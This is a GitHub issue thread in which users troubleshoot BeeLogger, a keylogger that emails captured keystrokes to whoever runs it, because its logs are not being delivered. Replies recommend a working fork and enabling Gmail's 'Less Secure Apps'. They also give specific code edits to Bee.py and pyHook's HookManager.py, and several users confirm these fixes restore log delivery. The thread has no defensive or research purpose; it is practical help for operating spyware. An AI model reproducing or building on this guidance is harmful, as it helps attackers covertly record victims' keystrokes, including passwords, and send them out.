BeeLogger icon indicating copy to clipboard operation
BeeLogger copied to clipboard

Beelogger is not sending logs.

Open miguelm9 opened this issue 7 years ago • 8 comments

So, I downloaded the version that should work of BeeLogger, but I still don't get the logs. I read that people had the same issue but the managed to fixed through another version. Can anyone please help me? Thanks.

miguelm9 avatar May 24 '18 16:05 miguelm9

Delete BeeLogger and clone from this Link https://github.com/jinwei908/BeeLogger

quantumcore avatar May 24 '18 18:05 quantumcore

@fastisbac I already did. Still does not work.

miguelm9 avatar May 25 '18 09:05 miguelm9

It's working for me. Try enabling Less Secure Apps in Gmail Settings.

quantumcore avatar May 25 '18 15:05 quantumcore

@fastisbac It is ON already.

miguelm9 avatar May 26 '18 09:05 miguelm9

@nerviosus there are 2 ways to solve the problem:

  1. You need to replace the python code in the Bee.py file in the template folder, in the folder beelogger there is a template folder and look for the code (ironm = win32event.CreateMutex) in Bee.py file delete the code after that

still in the same file, find the code (global data, lastWindow) delete the code (lastWindow) so that it becomes (global data) add the code after the code (window = event.WindowName)

lastWindow = "" (using quotation) globals () [lastWindow] = 1000

add the code

  1. find the file in .wine named (HookManager.py) in the folder "C: \ Python27 \ Lib \ site-packages \ pyHook" open the file and look for the code (event = KeyboardEvent) change the code "func = self.keyboard_funcs.get (msg)" to

"func = self.keyboard_funcs.get (int (str (msg)))" (without quotes)

if you are still confused contact my email "[email protected]" I will give you a file that has been repaired

dimskiOf avatar Nov 06 '18 07:11 dimskiOf

Delete BeeLogger and clone from this Link https://github.com/jinwei908/BeeLogger

Worked for me.

but in received logs Unicode character are represented by ? mark !!!

how to fix this ??

SOocoOT avatar Nov 16 '18 08:11 SOocoOT

@nerviosus there are 2 ways to solve the problem:

1. You need to replace the python code in the Bee.py file in the template folder, in the folder beelogger there is a template folder and look for the code (ironm = win32event.CreateMutex) in Bee.py file delete the code after that

still in the same file, find the code (global data, lastWindow) delete the code (lastWindow) so that it becomes (global data) add the code after the code (window = event.WindowName)

lastWindow = "" (using quotation) globals () [lastWindow] = 1000

add the code

1. find the file in .wine named (HookManager.py) in the folder "C: \ Python27 \ Lib \ site-packages \ pyHook" open the file and look for the code (event = KeyboardEvent)
   change the code "func = self.keyboard_funcs.get (msg)" to

"func = self.keyboard_funcs.get (int (str (msg)))" (without quotes)

if you are still confused contact my email "[email protected]" I will give you a file that has been repaired

I'm with same problem of not sending logs. I'll try this 1st way to fix it. I come back to tell if works. But i'm almost writing a new script inspired in Beelogger.

[EDIT] Fixed with 1st way above. Works great now!

erickpiloto avatar May 05 '19 20:05 erickpiloto

Delete BeeLogger and clone from this Link https://github.com/jinwei908/BeeLogger

This version does not send me logging, but the clone you suggest here is working perfectly. Thanks.

truesamurai avatar May 26 '20 16:05 truesamurai